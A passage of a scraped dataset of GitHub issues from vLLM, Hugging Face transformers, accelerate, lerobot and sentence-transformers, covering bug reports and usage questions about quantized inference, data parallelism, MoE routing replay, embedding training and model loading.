get_pp_group().is_last_rank:\n return IntermediateTensors(\n {\"hidden_states\": hidden_states, \"residual\": residual}\n )\n hidden_states, _ = self.norm(hidden_states, residual)\n return hidden_states\n```\n\nWhen `LAST_HIDDEN_STATE_NOT_NORM=1` is set, hidden states output exactly match Transformers' behavior.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30193", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-07T04:50:11Z", "updated_at": "2025-12-16T03:24:00Z", "comments": 3, "user": "guodongxiaren" }, { "repo": "huggingface/transformers", "number": 42674, "title": "Missing imports for DetrLoss and DetrHungarianMatcher", "body": "Previously, I was able to import these classes as \n```\nfrom transformers.models.detr.modeling_detr import DetrLoss, DetrObjectDetectionOutput, DetrHungarianMatcher\n```\n\nIn v4.57.3, the import fails and I also cannot find DetrLoss or DetrHungarianMatcher anywhere in the codebase. Have they been removed/replaced with an alternative? What is the up-to-date import?\n\nThank you for assistance / information", "url": "https://github.com/huggingface/transformers/issues/42674", "state": "open", "labels": [], "created_at": "2025-12-06T15:32:14Z", "updated_at": "2026-01-06T08:02:43Z", "comments": 1, "user": "sammlapp" }, { "repo": "vllm-project/vllm", "number": 30163, "title": "[Usage]: Help Running NVFP4 model on 2x DGX Spark with vLLM + Ray (multi-node)", "body": "### Your current environment\n\n# Help: Running NVFP4 model on 2x DGX Spark with vLLM + Ray (multi-node)\n\n## Hardware\n- **2x DGX Spark** (GB10 GPU each, sm_121a / compute capability 12.1)\n- Connected via 200GbE ConnectX-7/Ethernet\n- Driver: 580.95.05, Host CUDA: 13.0\n\n## Goal\nRun `lukealonso/GLM-4.6-NVFP4` (357B MoE model, NVFP4 quantization) across both nodes using vLLM with Ray distributed backend.\n\n## What I've Tried\n\n### 1. `nvcr.io/nvidia/vllm:25.11-py3` (NGC)\n- vLLM 0.11.0\n- **Error:** `FlashInfer kernels unavailable for ModelOptNvFp4FusedMoE on current platform`\n- NVFP4 requires vLLM 0.12.0+\n\n### 2. `vllm/vllm-openai:nightly-aarch64` (vLLM 0.11.2.dev575)\n- With `VLLM_USE_FLASHINFER_MOE_FP4=1`\n- **Error:** `ptxas fatal: Value 'sm_121a' is not defined for option 'gpu-name'`\n- Triton's bundled ptxas 12.8 doesn't support GB10\n\n### 3. `vllm/vllm-openai:v0.12.0-aarch64` (vLLM 0.12.0)\n- Fixed ptxas with symlink: `ln -sf /usr/local/cuda/bin/ptxas /usr/local/lib/python3.12/dist-packages/triton/backends/nvidia/bin/ptxas`\n- Triton compilation passes \u2705\n- **Error:** `RuntimeError: [FP4 gemm Runner] Failed to run cutlass FP4 gemm on sm120. Error: Error Internal`\n\n### 4. Tried both parallelism modes:\n- `--tensor-parallel-size 2` \u2192 same CUTLASS error\n- `--pipeline-parallel-size 2` \u2192 same CUTLASS error\n\n### 5. `--enforce-eager` flag\n- Not fully tested yet\n\n## Environment Details\n| Component | Version |\n|-----------|---------|\n| Host Driver | 580.95.05 |\n| Host CUDA | 13.0 |\n| Container CUDA | 12.9 |\n| Container ptxas | 12.9.86 (supports sm_121a \u2705) |\n| Triton bundled ptxas | 12.8 (NO sm_121a \u274c) |\n| PyTorch | 2.9.0+cu129 |\n\n## The Blocking Error\n\nvLLM correctly loads weights (41/41 shards), then during profile_run:\n\n```\nINFO [flashinfer_utils.py:289] Flashinfer TRTLLM MOE backend is only supported on SM100 and later, using CUTLASS backend instead\nINFO [modelopt.py:1142] Using FlashInfer CUTLASS kernels for ModelOptNvFp4FusedMoE.\n...\nRuntimeError: [FP4 gemm Runner] Failed to run cutlass FP4 gemm on sm120. Error: Error Internal\n```\n\nFlashInfer detects GB10 is not SM100 (B200), falls back to CUTLASS - but CUTLASS FP4 also fails.\n\n## Key Question\n\n**Are CUTLASS FP4 GEMM kernels compiled for GB10 (sm_121a)?**\n\nIs there:\n1. A vLLM build with CUTLASS kernels for sm_121?\n2. A way to force Marlin FP4 fallback on GB10?\n3. Recommended Docker image for DGX Spark + NVFP4?\n\nI see NVFP4 models tested on:\n- B200 (sm_100) \u2705\n- H100/A100 with Marlin FP4 fallback \u2705\n\nBut GB10 is **sm_121** (Blackwell desktop/workstation variant). The error says `sm120` which seems wrong - GB10 should be sm_121a.\n\n\n\n## References\n- [ GLM-4.6-NVFP4](https://huggingface.co/lukealonso/GLM-4.6-NVFP4)(https://huggingface.co/lukealonso/GLM-4.6-NVFP4)\n\n- [Firworks/GLM-4.5-Air-nvfp4](https://huggingface.co/Firworks/GLM-4.5-Air-nvfp4)\n\nThanks!\n", "url": "https://github.com/vllm-project/vllm/issues/30163", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-06T00:24:52Z", "updated_at": "2025-12-07T16:22:40Z", "comments": 2, "user": "letsrock85" }, { "repo": "huggingface/accelerate", "number": 3876, "title": "Why TP can't be used with pure DP?", "body": "As per [this](https://github.com/huggingface/accelerate/blob/b9ca0de682f25f15357a3f9f1a4d94374a1d451d/src/accelerate/parallelism_config.py#L332), we can not be use TP along with pure DP (or DDP). We need to shard the model across further nodes by specifying dp_shard_size as well. Why this limitation exists? Is it just a software limitation? \nPlease share any documentation, code reference and justification for the same.\n\nWhat to do inorder to do TP+DP?", "url": "https://github.com/huggingface/accelerate/issues/3876", "state": "open", "labels": [], "created_at": "2025-12-05T16:11:22Z", "updated_at": "2025-12-26T10:07:09Z", "comments": 3, "user": "quic-meetkuma" }, { "repo": "huggingface/lerobot", "number": 2589, "title": "Clarification on XVLA folding checkpoint", "body": "Hi Lerobot team, great work on the XVLA release!\n\nI have tried finetuning on my custom dataset and have a few clarifications:\n1. Is the [lerobot/xvla-folding](https://huggingface.co/lerobot/xvla-folding) checkpoint finetuned on [lerobot/xvla-soft-fold](https://huggingface.co/datasets/lerobot/xvla-soft-fold)? \n - I am asking this because the `info.json` don't match (eg. the dataset image keys are `observation.images.cam_high` whereby the checkpoint image keys are `observation.images.image`\n - The `observation.state` shape also do not match\n\n2. How do we finetune from a checkpoint given that the checkpoint expects different naming for the observation keys and `state` shape? Is this a custom preprocessor to remap keys or is there an arg to use?\n\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/2589", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-12-05T11:42:46Z", "updated_at": "2025-12-22T08:43:05Z", "user": "brycegoh" }, { "repo": "vllm-project/vllm", "number": 30129, "title": "[Feature]: About video input for qwen3vl", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nI tried using base64 encoding to provide video input for vllm inference, but it seems this input method is not yet supported by Qwen3VL (I've seen similar issues reported elsewhere). Currently, I can only specify parameters like fps/maximum frames and then pass the local path or URL of the video.\n\nHowever, in my scenario, my videos are not uniformly sampled; I need to manually sample them first and then input multiple frames. Is there a way to achieve this input method now?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30129", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-05T10:32:06Z", "updated_at": "2025-12-19T03:32:30Z", "comments": 4, "user": "lingcco" }, { "repo": "huggingface/sentence-transformers", "number": 3585, "title": "How to choose negative instance when using MultipleNegativesRankingLoss train embedding model?", "body": "Firstly, I am still confused how to choose negative instance if I use MultipleNegativesRankingLoss, in https://github.com/huggingface/sentence-transformers/blob/main/sentence_transformers/losses/MultipleNegativesRankingLoss.py# L113\n`embeddings = [self.model(sentence_feature)[\"sentence_embedding\"] for sentence_feature in sentence_features]\n`\nI guess `embeddings` should include three parts, anchor, positive and negative from in-batch data, however, no matter how I change `batchsize`, I still found `len(embeddings)=2`, is it means that this embeddings only include two parts?\n\n\nHere is my simple training script, I didn't add negative part in dataset,\n```\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3\"\nimport json\nimport torch\nfrom sentence_transformers import (\n SentenceTransformer, \n SentenceTransformerTrainer,\n SentenceTransformerTrainingArguments,\n InputExample, \n)\nfrom sentence_transformers.losses import MultipleNegativesRankingLoss\nfrom sentence_transformers.training_args import BatchSamplers\nfrom datasets import load_dataset, Dataset\ndef train_embedding_model():\n train_epo = 3\n save_path = f\"/app/raw_model/tmp\"\n data_path = \"/app/emb_train_1205.json\"\n model = SentenceTransformer(\n \"/app/download_models/Qwen3-Embedding-0.6B\",\n model_kwargs={\n \"attn_implementation\": \"flash_attention_2\",\n \"torch_dtype\": \"auto\"\n }\n )\n model.tokenizer.padding_side = \"left\"\n model.tokenizer.pad_token = model.tokenizer.eos_token\n model.tokenizer.model_max_length = 2048\n\n dataset = load_dataset(\"json\", data_files=data_path)\n '''\n DatasetDict({\n train: Dataset({\n features: ['question', 'positive'],\n num_rows: 4000\n })\n })\n '''\n loss = MultipleNegativesRankingLoss(model)\n args = SentenceTransformerTrainingArguments(\n output_dir=save_path,\n num_train_epochs=train_epo,\n per_device_train_batch_size=8,\n per_device_eval_batch_size=1,\n learning_rate=5e-5,\n warmup_ratio=0.1,\n fp16=True, # Set to False if you get an error that your GPU can't run on FP16\n bf16=False, # Set to True if you have a GPU that supports BF16\n batch_sampler=BatchSamplers.NO_DUPLICATES, # MultipleNegativesRankingLoss benefits from no duplicate samples in a batch \n optim='adamw_torch_fused',\n logging_steps=5,\n )\n\n trainer = SentenceTransformerTrainer(\n model=model,\n args=args,\n train_dataset=dataset['train'], # dataset['train'], train_dataset\n eval_dataset=dataset['train'], # dataset['train'], train_dataset\n loss=loss,\n )\n trainer.train()\n model.save_pretrained(save_path)\n```\n\nBesides\uff0c can I manually add a list of negatives directly into the dataset while still using the MultipleNegativesRankingLoss?", "url": "https://github.com/huggingface/sentence-transformers/issues/3585", "state": "open", "labels": [], "created_at": "2025-12-05T09:50:26Z", "updated_at": "2025-12-09T11:49:26Z", "user": "4daJKong" }, { "repo": "vllm-project/vllm", "number": 30124, "title": "[Bug]: How to run DeepSeek-V3.2 on 2 H100 nodes?", "body": "\n\n### \ud83d\udc1b Describe the bug\n\nHow to run DeepSeek-V3.2 on 2 H100 nodes?\nI only found the cmd for H200/B200:\nvllm serve deepseek-ai/DeepSeek-V3.2 -tp 8\n\nbut it does not work in multi-node scenarios (e.g., 2 H100 nodes).\n\nSo what should the cmd be for two H100 nodes?\nhow should params --tp/--dp/--pp be configured?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30124", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-05T09:40:45Z", "updated_at": "2025-12-14T08:57:52Z", "comments": 2, "user": "XQZ1120" }, { "repo": "vllm-project/vllm", "number": 30121, "title": "[Feature]: Could you please provide Chinese documentation for vLLM? \ud83d\ude0a", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nCould you please provide Chinese documentation for vLLM? \ud83d\ude0a\n\n\n\n### Alternatives\n\nCould you please provide Chinese documentation for vLLM? \ud83d\ude0a\n\n### Additional context\n\nCould you please provide Chinese documentation for vLLM? \ud83d\ude0a\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30121", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-05T08:13:46Z", "updated_at": "2025-12-08T04:31:05Z", "comments": 4, "user": "moshilangzi" }, { "repo": "huggingface/transformers", "number": 42641, "title": "Cannot inference llava-next with transformers==4.57.1 on dtype=\"auto\" bug", "body": "### System Info\n\n```\n- `transformers` version: 4.57.1\n- Platform: Linux-5.15.0-161-generic-x86_64-with-glibc2.35\n- Python version: 3.10.12\n- Huggingface_hub version: 0.35.3\n- Safetensors version: 0.6.2\n- Accelerate version: 1.10.1\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cpu (NA)\n- Tensorflow version (GPU?): 2.18.0 (False)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n```\n\n### Who can help?\n\n@zucchini-nlp \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```\nfrom transformers import LlavaNextProcessor, LlavaNextForConditionalGeneration\nimport torch\nfrom PIL import Image\nimport requests\n\nprocessor = LlavaNextProcessor.from_pretrained(\"llava-hf/llava-v1.6-mistral-7b-hf\")\n\nmodel = LlavaNextForConditionalGeneration.from_pretrained(\"llava-hf/llava-v1.6-mistral-7b-hf\", dtype=\"auto\", low_cpu_mem_usage=True) \n\n# prepare image and text prompt, using the appropriate prompt template\nurl = \"https://github.com/haotian-liu/LLaVA/blob/1a91fc274d7c35a9b50b3cb29c4247ae5837ce39/images/llava_v1_5_radar.jpg?raw=true\"\nimage = Image.open(requests.get(url, stream=True).raw)\n\n# Define a chat history and use `apply_chat_template` to get correctly formatted prompt\n# Each value in \"content\" has to be a list of dicts with types (\"text\", \"image\") \nconversation = [\n {\n\n \"role\": \"user\",\n \"content\": [\n {\"type\": \"text\", \"text\": \"What is shown in this image?\"},\n {\"type\": \"image\"},\n ],\n },\n]\nprompt = processor.apply_chat_template(conversation, add_generation_prompt=True)\n\ninputs = processor(images=image, text=prompt, return_tensors=\"pt\")\n\n# autoregressively complete prompt\noutput = model.generate(**inputs, max_new_tokens=100)\n\nprint(processor.decode(output[0], skip_special_tokens=True))\n```\n\n### Expected behavior\n\n\ud83d\udcdd Transformers GitHub Issue: Translation\nHere is the translated text for your GitHub issue, including the title and body.\n\nTitle\nCannot inference llava-next with transformers==4.57.1 on dtype=\"auto\" bug\n\nBody\nI am encountering an issue when attempting to run inference on LLaVA-Next models (e.g., `llava-hf/llava-v1.6-mistral-7b-hf`) using `transformers==4.57.1 ` and setting `dtype=\"auto\"` when loading the model.\n\nThe issue stems from the model's `config.json` having different `torch_dtype` values for the overall model and the text configuration:\n\n```\n\"text_config\": {\n \"_name_or_path\": \"mistralai/Mistral-7B-Instruct-v0.2\",\n // ... other config values\n \"torch_dtype\": \"bfloat16\",\n \"vocab_size\": 32064\n },\n \"torch_dtype\": \"float16\",\n```\n\nWhen the model is loaded with `dtype=\"auto\"`, each submodule (the visual model and the text model) seems to load with its respective `torch_dtype` (`\"float16\"` and `\"bfloat16\"`).\n\nThis difference in data types then causes an error during inference, specifically within the `forward` pass of the `LlavaNextForConditionalGeneration` model:\n\n```\nFile \"MY_ENV/.venv/lib/python3.10/site-packages/transformers/models/llava_next/modeling_llava_next.py\", line 687, in forward\n\u00a0 \u00a0 logits = self.lm_head(hidden_states[:, slice_indices, :])\n\u00a0 File \"MY_ENV/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\n\u00a0 \u00a0 return self._call_impl(*args, **kwargs)\n\u00a0 File \"MY_ENV/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\n\u00a0 \u00a0 return forward_call(*args, **kwargs)\n\u00a0 File \"MY_ENV/.venv/lib/python3.10/site-packages/torch/nn/modules/linear.py\", line 125, in forward\n\u00a0 \u00a0 return F.linear(input, self.weight, self.bias)\nRuntimeError: expected m1 and m2 to have the same dtype, but got: c10::BFloat16 != c10::Half\n```\n\nThis `RuntimeError` indicates a dtype mismatch, likely between the linear layer's weight (from `self.lm_head`) and the input tensor (`hidden_states`), which results from the different dtypes loaded by `dtype=\"auto\"` for `self.lm_head` and `self.model`.\n\nIs there a plan to support loading LLaVA-Next models with `dtype=\"auto\"` given their current configuration structure?", "url": "https://github.com/huggingface/transformers/issues/42641", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-05T04:39:35Z", "updated_at": "2025-12-23T11:08:56Z", "comments": 5, "user": "rebel-seinpark" }, { "repo": "vllm-project/vllm", "number": 30098, "title": "[Doc]: Misleading Logic & Docstring in `block_quant_to_tensor_quant` (Block FP8)", "body": "### \ud83d\udcda The doc issue\n\nThe docstring and implementation of the `block_quant_to_tensor_quant` function have a critical mismatch regarding the dequantization process, leading to numerical errors when used outside of specific fused kernel backends.\n\n### Problematic Function\n\nThe function is currently implemented as:\n\n```python\ndef block_quant_to_tensor_quant(\n x_q_block: torch.Tensor,\n x_s: torch.Tensor,\n) -> tuple[torch.Tensor, torch.Tensor]:\n \"\"\"This function converts block-wise quantization to tensor-wise\n quantization. The inputs are block-wise quantization tensor `x_q_block`,\n block-wise quantization scale and the block size.\n The outputs are tensor-wise quantization tensor and tensor-wise\n quantization scale. Note only float8 is supported for now.\n \"\"\"\n x_dq_block = group_broadcast(x_q_block, x_s)\n x_q_tensor, scale = input_to_float8(x_dq_block, dtype=x_q_block.dtype)\n return x_q_tensor, scale\n```\n\n### Observation and Impact\n- Vllm migrated the actual 'block quant to tensor quant' operation to the kernel but keep this method. The docstring is misleading since in this method, there is no scale.\n- Misleading Docstring: The docstring claims the function performs \"conversion\" and takes the \"scale,\" implying a complete process. However, the output `x_dq_block` is an un-dequantized value with a broadcasted shape.\n\n### Suggest a potential alternative/fix\n\nThe function should be either documented clearly as a kernel preparation helper OR refactored to ensure numerical correctness when used as a conversion API.\n\n**1. Fix Documentation/Name (If intent is kernel prep):**\n* Rename the function to something like `_prepare_block_quant_for_fused_kernel`.\n* Add a warning that this function does not perform dequantization.\n\n**2. Implement Safe Logic Dispatch (If intent is a robust conversion API):**\nThe function should dynamically dispatch to the known-good, safe path if the specific fused kernel (that handles the $X_q \\times X_s$ multiplication) is not guaranteed to be active.\n\nThe safe logic is in v.0.9.2:\n```python\n# Safe path required for correctness on general backends\nx_dq_block = scaled_dequantize(x_q_block, x_s) \nx_q_tensor, scale = input_to_float8(x_dq_block, dtype=x_q_block.dtype)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30098", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-05T02:12:07Z", "updated_at": "2025-12-24T17:22:50Z", "comments": 0, "user": "xqoasis" }, { "repo": "huggingface/transformers", "number": 42638, "title": "Routing Replay for MoEs", "body": "### Feature request\n\nRecentRL approaches for training MoE models increasingly rely on **Routing Replay**, as described in the following papers:\n\n- https://huggingface.co/papers/2507.18071\n- https://huggingface.co/papers/2510.11370\n- https://huggingface.co/papers/2512.01374\n\nWithout going into the training details, Routing Replay requires the ability to override the router during the forward pass, that is, to force the model to use a predefined set of router logits rather than computing new ones. This enables deterministic reproduction of expert selection.\n\nAFAICT, Transformers currently does not expose a way to override router logits or manually control expert selection at inference/training time.\n\nI imagine something along the following lines (minimal example):\n\n```python\nfrom transformers import AutoModelForCausalLM\nimport torch\n\nmodel = AutoModelForCausalLM.from_pretrained(\"Qwen/Qwen3-30B-A3B-Instruct-2507\", device_map=\"auto\", dtype=\"auto\")\n\ninput_ids = torch.tensor([[1, 2, 3, 4]], device=\"cuda\")\n\n# Standard forward pass, retrieving router logits\noutputs = model(input_ids, output_router_logits=True)\n\n# Forward pass with router logits injected (enabling Routing Replay)\nmodel(input_ids, router_logits=outputs.router_logits)\n```\n\n## Alternative\n\nIf we decide not to implement this feature, it would be nice to provide an example showing how to _patch_ a MoE to enable this.\n\n### Motivation\n\nSee above.\n\n### Your contribution\n\nI think I can do it.", "url": "https://github.com/huggingface/transformers/issues/42638", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-12-04T23:58:14Z", "updated_at": "2025-12-05T16:29:05Z", "comments": 2, "user": "qgallouedec" }, { "repo": "vllm-project/vllm", "number": 30084, "title": "[Performance]: Should I expect linear scaling with pure DP?", "body": "### Proposal to improve performance\n\n_No response_\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\nI decided to benchmark vLLM 0.11.2 with pure DP of Qwen/Qwen2.5-32B-Instruct deployment(before benchmarking DP+EP with Qwen/Qwen3-30B-A3B-Instruct-2507) on DP1 vs DP8 (H200):\n\nDP1 deployment:\n```\nvllm serve ${MODEL_NAME} \\\n --port 8000 \\\n --trust-remote-code\n```\n\nDP8 deployment:\n```\nvllm serve ${MODEL_NAME} \\\n --port 8000 \\\n --trust-remote-code \\\n --data-parallel-size 8 \\\n --data-parallel-size-local 8\n```\n\nMy benchmark roughly looks like this:\n```\nfor rate in [10, 20, ... 100, 200, ... 1000, 2000, ... 100000]:\n vllm bench serve \\\n --host \"$HOST\" \\\n --model Qwen/Qwen2.5-32B-Instruct \\\n --dataset-name random \\\n --random-input-len 128 \\\n --random-output-len 128 \\\n --num-prompts 10000 \\\n --request-rate \"$rate\" \\\n --ignore-eos\n```\nShould I expect ~8x scaling? Result show only ~4x (duration, request throughput, tokens throughput, etc...)\n\n\"Image\"\n\ncc @KeitaW @amanshanbhag\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30084", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-04T19:52:45Z", "updated_at": "2025-12-16T04:09:24Z", "comments": 7, "user": "pbelevich" }, { "repo": "vllm-project/vllm", "number": 30082, "title": "[Usage]: Turn off reasoning for Kimi-K2-Thinking?", "body": "### Your current environment\n\n\n\n```text\nOutput of collect_env.py-\n\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.1.3\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu129\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Oct 10 2025, 08:52:57) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-4.18.0-553.56.1.el8_10.x86_64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA H200\nGPU 1: NVIDIA H200\nGPU 2: NVIDIA H200\nGPU 3: NVIDIA H200\nGPU 4: NVIDIA H200\nGPU 5: NVIDIA H200\nGPU 6: NVIDIA H200\nGPU 7: NVIDIA H200\n\nNvidia driver version : 550.163.01\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8468\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 8\nCPU max MHz: 3800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 210 MiB (2 instances)\nNUMA node(s): 8\nNUMA node0 CPU(s): 0-11,96-107\nNUMA node1 CPU(s): 12-23,108-119\nNUMA node2 CPU(s): 24-35,120-131\nNUMA node3 CPU(s): 36-47,132-143\nNUMA node4 CPU(s): 48-59,144-155\nNUMA node5 CPU(s): 60-71,156-167\nNUMA node6 CPU(s): 72-83,168-179\nNUMA node7 CPU(s): 84-95,180-191\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spect", "url": "https://github.com/vllm-project/vllm/issues/30082", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-04T19:32:13Z", "updated_at": "2025-12-08T23:02:58Z", "comments": 2, "user": "vikrantdeshpande09876" }, { "repo": "vllm-project/vllm", "number": 30075, "title": "[Feature]: Default eplb num_redundant_experts to the lowest valid value if unspecified", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nEPLB requires the number of experts to be chosen up front and there is a known minimum valid value that can be derived from the vllm startup configuration. Since extra EPLB experts trades kv cache memory for potential performance improvements, but that is not guaranteed to pay off, having the EPLB value default to the minimum valid value would reduce friction on enabling EPLB the first time until users are ready to tune.\n\nAs a consequence, it would also streamline templating the same config to work across multiple EP sizes for the default case.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30075", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-12-04T18:19:03Z", "updated_at": "2025-12-20T21:00:23Z", "comments": 4, "user": "smarterclayton" }, { "repo": "vllm-project/vllm", "number": 30058, "title": "[Feature]: Multi-Adapter Support for Embed Qwen3 8B Embedding Model", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nHi Team, do we currently support multi-adapter (LoRA) support for embedding models, specifically Qwen3 8B Embedding model? If not, when can we expect the support? Thanks :)\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30058", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-04T12:05:15Z", "updated_at": "2025-12-04T19:42:04Z", "comments": 4, "user": "dawnik17" }, { "repo": "huggingface/accelerate", "number": 3873, "title": "How to specify accelerate launch yaml config item when running with torchrun", "body": "I've read the doc [Launching Accelerate scripts](https://huggingface.co/docs/accelerate/basic_tutorials/launch), and would like to launch with torchrun. However, the doc does not mention how to specify configs like `distribute_type` when using torchrun.\n\nWhat are the equivalent of these configurations when using torchrun?", "url": "https://github.com/huggingface/accelerate/issues/3873", "state": "open", "labels": [], "created_at": "2025-12-04T07:27:43Z", "updated_at": "2026-01-03T15:07:19Z", "user": "WhoisZihan" }, { "repo": "huggingface/lerobot", "number": 2580, "title": "How can the leader arm be synchronized to follow the follower arm during inference?", "body": "", "url": "https://github.com/huggingface/lerobot/issues/2580", "state": "open", "labels": [], "created_at": "2025-12-04T07:22:07Z", "updated_at": "2025-12-11T02:53:11Z", "user": "zhoushaoxiang" }, { "repo": "vllm-project/vllm", "number": 30023, "title": "[Feature]: Support qwen3next with GGUF?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWith v0.11.0, `vllm` report:\n\n```\nvllm | (APIServer pid=1) ValueError: GGUF model with architecture qwen3next is not supported yet.\n```\n\nhttps://huggingface.co/Qwen/Qwen3-Next-80B-A3B-Thinking-GGUF\n\n\nI did a simple dig for this, seems the vllm has support of `Qwen3-Next` as architecture is `qwen3_next`.\nBut the `Qwen` set it as `qwen3next`.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant 